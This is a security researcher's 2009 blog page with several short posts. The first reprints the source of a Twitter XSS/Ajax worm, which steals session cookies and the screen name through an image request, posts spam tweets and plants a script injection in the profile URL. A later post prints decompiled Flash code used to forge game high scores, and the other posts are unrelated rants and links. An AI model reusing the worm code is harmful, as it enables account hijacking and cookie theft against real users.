Create an Account
username: password:
  MemeStreams Logo

Curiouser and Curiouser


Picture of Acidus
My Blog
My Profile
My Audience
My Sources
Send Me a Message

sponsored links

Acidus's topics
Health and Wellness
Home and Garden
Current Events
Local Information

support us

Get MemeStreams Stuff!

Current Topic: Miscellaneous

Another Ajax powered XSS worm
Topic: Miscellaneous 10:06 pm EDT, Apr 12, 2009

An XSS/Ajax worm hit Twitter. But its cool, because Ajax doesn't help amplify XSS attacks right? oh, wait, maybe it does. ;-)

Update: Source

function XHConn()
  var xmlhttp, bComplete = false;
  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (e) { try { xmlhttp = new XMLHttpRequest(); }
  catch (e) { xmlhttp = false; }}}
  if (!xmlhttp) return null;
  this.connect = function(sURL, sMethod, sVars, fnDone)
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
      if (sMethod == "GET")
      {, sURL+"?"+sVars, true);
        sVars = "";
      {, sURL, true);
        xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
      xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4 && !bComplete)
          bComplete = true;
    catch(z) { return false; }
    return true;
  return this;
function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';
    ret = encodeURIComponent(ret);
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    return ret;
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='" + cookie + "&username=" + username + "'>");
document.write("<img src=''>");
function wait()
  var content = document.documentElement.innerHTML;
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];
  var randomUpdate=new Array();
  randomUpdate[0]="Dude, is awesome. What's the fuss?";
  randomUpdate[1]="Join everyone!";
  randomUpdate[2]="Woooo, :)";
  randomUpdate[3]="Virus!? What? is legit!";
  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
  updateEncode = urlencode(genRand);
  var xss = urlencode('"></a><script src=""></script><a ');
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

Another Ajax powered XSS worm

ICANN == Whores
Topic: Miscellaneous 11:32 pm EDT, Apr  8, 2009

The familiar .com, .net, .org and 18 other suffixes — officially "generic top-level domains" — could be joined by a seemingly endless stream of new ones next year under a landmark change approved last summer by the Internet Corp. for Assigned Names and Numbers, the entity that oversees the Web's address system.

Tourists might find information about the Liberty Bell, for example, at a site ending in .philly. A rapper might apply for a Web address ending in .hiphop.

"Whatever is open to the imagination can be applied for," says Paul Levins, ICANN's vice president of corporate affairs. "It could translate into one of the largest marketing and branding opportunities in history."

ICANN needs to be stopped. They proposing and prompting concepts that will irrevocably damage the Internet with essentially no one to keep them in check.

Something seriously must be done about the pollution of the TLDs.

From RFC 1591 in 1994:

2. The Top Level Structure of the Domain Names

In the Domain Name System (DNS) naming of computers there is a
hierarchy of names. The root of system is unnamed. There are a set
of what are called "top-level domain names" (TLDs). These are the
generic TLDs (EDU, COM, NET, ORG, GOV, MIL, and INT), and the two
letter country codes from ISO-3166. It is extremely unlikely that
any other TLDs will be created.

Postel must be screaming in his grave to know ICANN rolled like a dog in heat to special interests and already created bullshit TLDs like:


This is insanity. ICANN's mission statement is not to facilitate "the largest marketing and branding opportunities in history." Its to manage and preserve the operational stability of the Internet's addressing systems! When the hell did it become being a stooge for the world's ISPs?

Fuck. This. Shit.

ICANN == Whores

Lux Aeterna Cover
Topic: Miscellaneous 9:48 am EDT, Apr  6, 2009

Very cool. The drums fit well with this song.

Lux Aeterna Cover

Grok This: Forget The Business Books, Go Sci-Fi To Stoke Your Imagination
Topic: Miscellaneous 10:10 pm EDT, Apr  5, 2009

Here are a few of my favorite science fiction books, and what I learned from them (they are roughly in my favorite order):null

Arrington's book list

Grok This: Forget The Business Books, Go Sci-Fi To Stoke Your Imagination

Practical uses of SWFScan
Topic: Miscellaneous 2:46 pm EDT, Apr  1, 2009

Or: How Billy hacked Zombie Hooker Nightmare to get his name on TV during [adult swim].

 public static function submit(arg0:String, arg1:Number) : String
        strURI = null;
        nGameId = null;
        nScore = NaN;
        nTime = NaN;
        strTime = null;
        strN1 = null;
        strN2 = null;
        n1 = NaN;
        n2 = NaN;
        nAlgo = NaN;
        strToPass = null;
        encrypted_data = null;
        submission_data = null;
        variables = null;
        request = null;
        gameID = arg0;
        score = arg1;
        try {
                strURI ="getLittleServer");
                nGameId = gameID;
                nScore = score;
                nTime ="getSrvrTime");
                strTime = toString();
                strN1 = substr(253, 3);
                strN2 = substr(252, 3);
                n1 = parseInt(strN1);
                n2 = parseInt(strN2);
                nAlgo = n1 * n2 * nScore + nScore;
                strToPass = nGameId + "," + nScore + "," + nTime + "," + nAlgo;

                encrypted_data = MD5.hash(strToPass);
                submission_data = "score=" + nScore + "|gameId=" + nGameId + "|timestamp=" + nTime + "|key=" + encrypted_data;


                variables = new URLVariables();
            variables.attr1 = submission_data;
                request = new URLRequest(strURI);
   = variables;
            navigateToURL(request, "_self");
            return submission_data;
        } catch (e:Error) {
            var loc1:* = e;
                gameID = null;
        return null;

Practical uses of SWFScan

... ...
Topic: Miscellaneous 1:00 pm EDT, Apr  1, 2009

I love getting the emails that go:

Dear Billy,

blah blah blah, tried every possible option, blah blah blah, new rule, blah blah blah, nothing I can do.

When really they just could have written: "Dear Billy, Fuck You."


Man tries to pay bill with spider drawing
Topic: Miscellaneous 3:45 pm EDT, Mar 31, 2009

Man tries to pay bill with spider drawing

SPI Labs Dinner
Topic: Miscellaneous 10:17 pm EDT, Mar 24, 2009

Caleb: What do you think Jeff? Did you like it?
Jeff: I like the other 5 we had at the other place.

ahhhh memories.

SPI Labs Dinner

Billy Wins a Cheeseburger
Topic: Miscellaneous 4:32 pm EDT, Mar 23, 2009

I win!

Billy Wins a Cheeseburger

Total Browser Pwnag3 V1.0 Public
Topic: Miscellaneous 11:52 pm EDT, Mar 18, 2009

This is a very good preso. Bravo Rafal!

Total Browser Pwnag3 V1.0 Public

(Last) Newer << 15 ++ 25 - 26 - 27 - 28 - 29 - 30 - 31 - 32 - 33 ++ 43 >> Older (First)
Powered By Industrial Memetics